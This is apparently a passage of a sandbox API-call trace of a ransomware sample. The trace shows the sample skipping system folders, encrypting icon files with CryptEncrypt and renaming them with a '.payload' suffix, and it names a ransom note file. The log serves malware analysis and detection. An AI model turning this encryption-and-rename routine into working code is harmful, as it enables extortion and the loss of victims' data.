lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.471] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.471] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.471] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.471] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.471] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.471] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\..") returned 37 [0060.471] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.471] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.471] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0060.471] lstrcmpiW (lpString1="Print.ico", lpString2="Windows") returned -1 [0060.471] lstrcmpiW (lpString1="Print.ico", lpString2="$Recycle.bin") returned 1 [0060.471] lstrcmpiW (lpString1="Print.ico", lpString2="System Volume Information") returned -1 [0060.471] lstrcmpiW (lpString1="Print.ico", lpString2="Program Files") returned -1 [0060.471] lstrcmpiW (lpString1="Print.ico", lpString2="Program Files (x86)") returned -1 [0060.471] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 44 [0060.471] StrStrIW (lpFirst="Print.ico", lpSrch=".payload") returned 0x0 [0060.471] lstrcmpW (lpString1="Print.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.471] lstrcmpW (lpString1="Print.ico", lpString2="taridd") returned -1 [0060.471] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.471] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.472] GetTickCount () returned 0x114f8b9 [0060.472] GetTickCount () returned 0x114f8b9 [0060.472] GetTickCount () returned 0x114f8b9 [0060.472] GetTickCount () returned 0x114f8b9 [0060.472] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.472] GetProcessHeap () returned 0x5e0000 [0060.472] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.472] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.473] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.473] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0060.474] GetProcessHeap () returned 0x5e0000 [0060.474] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.474] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.474] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.474] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.474] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.474] CloseHandle (hObject=0x438) returned 1 [0060.475] GetProcessHeap () returned 0x5e0000 [0060.475] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.475] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico_r00t_{nhhHyu}.payload") returned 66 [0060.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.475] GetProcessHeap () returned 0x5e0000 [0060.475] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.475] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0060.475] lstrcmpiW (lpString1="Rotate1.ico", lpString2="Windows") returned -1 [0060.475] lstrcmpiW (lpString1="Rotate1.ico", lpString2="$Recycle.bin") returned 1 [0060.475] lstrcmpiW (lpString1="Rotate1.ico", lpString2="System Volume Information") returned -1 [0060.475] lstrcmpiW (lpString1="Rotate1.ico", lpString2="Program Files") returned 1 [0060.475] lstrcmpiW (lpString1="Rotate1.ico", lpString2="Program Files (x86)") returned 1 [0060.475] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 46 [0060.475] StrStrIW (lpFirst="Rotate1.ico", lpSrch=".payload") returned 0x0 [0060.475] lstrcmpW (lpString1="Rotate1.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.476] lstrcmpW (lpString1="Rotate1.ico", lpString2="taridd") returned -1 [0060.476] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.476] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.476] GetTickCount () returned 0x114f8b9 [0060.476] GetTickCount () returned 0x114f8b9 [0060.476] GetTickCount () returned 0x114f8b9 [0060.476] GetTickCount () returned 0x114f8b9 [0060.476] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.476] GetProcessHeap () returned 0x5e0000 [0060.476] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.476] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.567] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.567] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.567] GetProcessHeap () returned 0x5e0000 [0060.567] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.567] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.568] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.568] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.568] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.568] CloseHandle (hObject=0x438) returned 1 [0060.569] GetProcessHeap () returned 0x5e0000 [0060.569] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.569] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico_r00t_{nhhHyu}.payload") returned 68 [0060.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.569] GetProcessHeap () returned 0x5e0000 [0060.569] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.569] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0060.569] lstrcmpiW (lpString1="Rotate2.ico", lpString2="Windows") returned -1 [0060.569] lstrcmpiW (lpString1="Rotate2.ico", lpString2="$Recycle.bin") returned 1 [0060.570] lstrcmpiW (lpString1="Rotate2.ico", lpString2="System Volume Information") returned -1 [0060.570] lstrcmpiW (lpString1="Rotate2.ico", lpString2="Program Files") returned 1 [0060.570] lstrcmpiW (lpString1="Rotate2.ico", lpString2="Program Files (x86)") returned 1 [0060.570] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 46 [0060.570] StrStrIW (lpFirst="Rotate2.ico", lpSrch=".payload") returned 0x0 [0060.570] lstrcmpW (lpString1="Rotate2.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.570] lstrcmpW (lpString1="Rotate2.ico", lpString2="taridd") returned -1 [0060.570] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.570] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.570] GetTickCount () returned 0x114f917 [0060.570] GetTickCount () returned 0x114f917 [0060.570] GetTickCount () returned 0x114f917 [0060.570] GetTickCount () returned 0x114f917 [0060.570] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.570] GetProcessHeap () returned 0x5e0000 [0060.570] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.570] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.572] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.572] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.572] GetProcessHeap () returned 0x5e0000 [0060.572] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.572] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.572] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.572] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.572] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.572] CloseHandle (hObject=0x438) returned 1 [0060.573] GetProcessHeap () returned 0x5e0000 [0060.574] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.574] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico_r00t_{nhhHyu}.payload") returned 68 [0060.574] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.574] GetProcessHeap () returned 0x5e0000 [0060.574] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.574] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0060.574] lstrcmpiW (lpString1="Rotate3.ico", lpString2="Windows") returned -1 [0060.574] lstrcmpiW (lpString1="Rotate3.ico", lpString2="$Recycle.bin") returned 1 [0060.574] lstrcmpiW (lpString1="Rotate3.ico", lpString2="System Volume Information") returned -1 [0060.574] lstrcmpiW (lpString1="Rotate3.ico", lpString2="Program Files") returned 1 [0060.574] lstrcmpiW (lpString1="Rotate3.ico", lpString2="Program Files (x86)") returned 1 [0060.574] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 46 [0060.574] StrStrIW (lpFirst="Rotate3.ico", lpSrch=".payload") returned 0x0 [0060.574] lstrcmpW (lpString1="Rotate3.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.574] lstrcmpW (lpString1="Rotate3.ico", lpString2="taridd") returned -1 [0060.574] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.574] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.575] GetTickCount () returned 0x114f926 [0060.575] GetTickCount () returned 0x114f926 [0060.575] GetTickCount () returned 0x114f926 [0060.575] GetTickCount () returned 0x114f926 [0060.575] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.575] GetProcessHeap () returned 0x5e0000 [0060.575] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.575] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.576] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.576] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.576] GetProcessHeap () returned 0x5e0000 [0060.577] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.577] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.577] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.577] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.577] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.577] CloseHandle (hObject=0x438) returned 1 [0060.577] GetProcessHeap () returned 0x5e0000 [0060.577] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x6432a0 [0060.578] wnsprintfW (in: pszDest=0x6432a0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico_r00t_{nhhHyu}.payload") returned 68 [0060.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico_r00t_{nhhhyu}.payload")) returned 1 [0060.578] GetProcessHeap () returned 0x5e0000 [0060.578] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.578] FindNextFileW (in: hFindFile=0x606420, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0060.578] lstrcmpiW (lpString1="Rotate4.ico", lpString2="Windows") returned -1 [0060.578] lstrcmpiW (lpString1="Rotate4.ico", lpString2="$Recycle.bin") returned 1 [0060.578] lstrcmpiW (lpString1="Rotate4.ico", lpString2="System Volume Information") returned -1 [0060.578] lstrcmpiW (lpString1="Rotate4.ico", lpString2="Program Files") returned 1 [0060.578] lstrcmpiW (lpString1="Rotate4.ico", lpString2="Program Files (x86)") returned 1 [0060.578] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 46 [0060.578] StrStrIW (lpFirst="Rotate4.ico", lpSrch=".payload") returned 0x0 [0060.578] lstrcmpW (lpString1="Rotate4.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.578] lstrcmpW (lpString1="Rotate4.ico", lpString2="taridd") returned -1 [0060.579] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.579] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.579] GetTickCount () returned 0x114f926 [0060.579] GetTickCount () returned 0x114f926 [0060.579] GetTickCount () returned 0x114f926 [0060.579] GetTickCount () returned 0x114f926 [0060.579] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.579] GetProcessHeap () returned 0x5e0000 [0060.579] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0060.579] ReadFile (in: hFile=0x438, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.581] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.581] WriteFile (in: hFile=0x438, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0060.581] GetProcessHeap () returned 0x5e0000 [0060.581] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0060.581] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.581] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.581] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.581] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: 